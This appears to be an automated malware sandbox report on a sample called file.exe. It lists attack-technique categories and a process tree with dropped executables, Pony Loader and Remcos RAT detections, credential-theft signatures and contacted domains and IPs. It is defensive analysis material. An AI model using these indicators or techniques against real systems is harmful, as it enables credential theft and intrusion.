                    Collection: 1 Archive Collected Data; 2 Data from Local System; 1 Screen Capture; 1 Email Collection; 211 Input Capture; 3 Clipboard Data; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                    Command and Control: 22 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 122 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                    Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1574872 | Sample: file.exe | Startdate: 13/12/2024 | Architecture: WINDOWS | Score: 100
                    Start
                      DNS/IP: www.mva.by; admino.ml; mva.by
                      Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 24 other signatures
                      file.exe 17 (started)
                        DNS/IP: mva.by 93.125.99.121, 49704, 80 BELPAK-ASBELPAKBY Belarus
                        Dropped: C:\Users\user\AppData\Roaming\...\file.exe, PE32
                        Dropped: C:\Users\user\AppData\Local\Temp\SGS.exe, PE32
                        Dropped: C:\Users\user\AppData\Local\...\scan[1].exe, PE32
                        Dropped: C:\Users\user\...\file.exe:Zone.Identifier, ASCII
                        Signatures: Drops PE files to the startup folder; Injects a PE file into a foreign processes
                        SGS.exe (started)
                          Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code; 2 other signatures
                          SGS.exe 1 14 (started)
                            cmd.exe 1 (started)
                              conhost.exe (started)
                        file.exe 1 4 (started)
                          DNS/IP: 154.16.63.197, 3360, 49705, 49751 ASDETUKhttpwwwheficedcomGB South Africa
                          Dropped: C:\Users\user\AppData\Roaming\...\logs.dat, ASCII
                          Signatures: Opens the same file many times (likely Sandbox evasion)
                          conhost.exe (started)
                      file.exe 14 (started)
                        SGS.exe (started)
                          Signatures: Injects a PE file into a foreign processes
                          SGS.exe 14 (started)
                            Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
                            cmd.exe (started)
                              conhost.exe (started)
                        file.exe (started)
                          Signatures: Detected Remcos RAT; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
